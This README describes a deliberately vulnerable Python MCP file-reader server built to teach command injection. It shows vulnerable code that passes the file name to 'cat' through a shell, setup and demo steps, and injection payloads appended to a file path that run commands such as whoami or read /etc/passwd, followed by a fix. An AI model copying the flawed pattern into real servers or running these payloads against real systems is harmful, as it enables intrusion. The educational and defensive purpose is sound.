Eliran79/Vulnerable-file-reader-server
A deliberately vulnerable MCP server demonstrating command injection flaws. This Python implementation shows how lack of input sanitization in file paths leads to critical security vulnerabilities allowing attackers to execute arbitrary commands. For educational purposes only - demonstrates both the vulnerability and proper security practices.
Command Injection Vulnerability in MCP File Reader
This repository demonstrates a critical command injection vulnerability in a Python MCP (Model Context Protocol) server implementation. The vulnerability allows attackers to execute arbitrary shell commands on the host system by manipulating the file path parameter.
The Vulnerability
The vulnerability exists in the read_file function which is intended to read files from a "safe" directory but contains a dangerous implementation flaw:
command = f"cat {file_name}"
result = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT)
This code is vulnerable because:
- It uses
shell=Truewhich invokes a shell to execute the command - It directly interpolates user input (
file_name) into the command string without proper sanitization - It performs only superficial validation on the input path
A simple semantic difference between using quotes around the filename ('file_name') and not using quotes (file_name) exposes the entire system to command execution.
Installation
Prerequisites
- Python 3.12 or higher
- MCP library version 1.6.0
Setup
-
Clone this repository:
git clone https://github.com/Eliran79/Vulnerable-file-reader-server.git cd Vulnerable-file-reader-server -
Install the MCP server:
mcp install main.py -
Configure Claude Desktop to use your MCP server by editing
~/.config/claude-desktop/claude_desktop_config.json:{ "mcpServers": { "file-reader": { "command": "/ABSOLUTE/PATH/TO/uv", "args": [ "--directory", "/data/git/file_reader_server", "/usr/bin/uv", "run,--with,mcp,mcp,run,main.py" ] } } }Be sure to replace
/ABSOLUTE/PATH/TO/uvwith the actual path to your uv executable and adjust the directory path if needed. -
Start the MCP server in development mode:
mcp dev main.py
Demonstration
-
In a separate terminal, install and run the MCP inspector:
pip install mcp-inspector mcp-inspector -
Connect to the server in the MCP Inspector GUI:
- Set Transport Type to "STDIO"
- Set Command to:
run --with mcp run main.py - Click "Restart"
-
Exploit the vulnerability:
- Go to the "Tools" tab
- Find the "read_file" tool
- In the "file_name" field, enter:
/tmp/safe/test.txt; whoami - Click "Run Tool"
-
You should see the contents of test.txt followed by your username, demonstrating successful command execution.
Additional Exploitation Examples
Here are more command injection payloads to try:
/tmp/safe/test.txt; id
/tmp/safe/test.txt; ls -la /etc
/tmp/safe/test.txt; cat /etc/passwd
/tmp/safe/test.txt; echo $(hostname)
/tmp/safe/test.txt; find / -name "*.conf" 2>/dev/null | head -5
Proper Fix
To fix this vulnerability, never use shell=True with user-provided input. Instead:
# SECURE: Use a list of arguments instead of shell=True
result = subprocess.check_output(['cat', file_name], shell=False)
# OR, if shell=True is necessary, properly quote the argument:
import shlex
result = subprocess.check_output(f"cat {shlex.quote(file_name)}", shell=True)
# AND perform proper path validation:
import os
safe_dir_resolved = os.path.abspath(SAFE_DIRECTORY)
requested_path_resolved = os.path.abspath(file_name)
if not requested_path_resolved.startswith(safe_dir_resolved):
return f"Error: Access denied. Path traversal attempt detected."
Warning
⚠️ FOR EDUCATIONAL PURPOSES ONLY: This implementation contains deliberate security vulnerabilities. Never use this code in a production environment or on any system that contains sensitive information.
Recommend MCP Servers 💡
specbridge
An MCP server that converts OpenAPI specifications into MCP tools by scanning a folder for spec files and auto-generating tools
mcp-wecombot-server
An MCP server application that sends various types of messages to the WeCom group robot.
ssh-mcp
MCP server exposing SSH control for Linux servers via Model Context Protocol.
mcp-access-point
Turn a web server into an MCP server in one click without making any code changes.
@Jktfe/servemyapi
A personal MCP (Model Context Protocol) server for securely storing and accessing API keys across projects using the macOS Keychain.
mcp-server-time
A Model Context Protocol server that provides time and timezone conversion capabilities, enabling LLMs to get current time information and perform timezone conversions using IANA timezone names.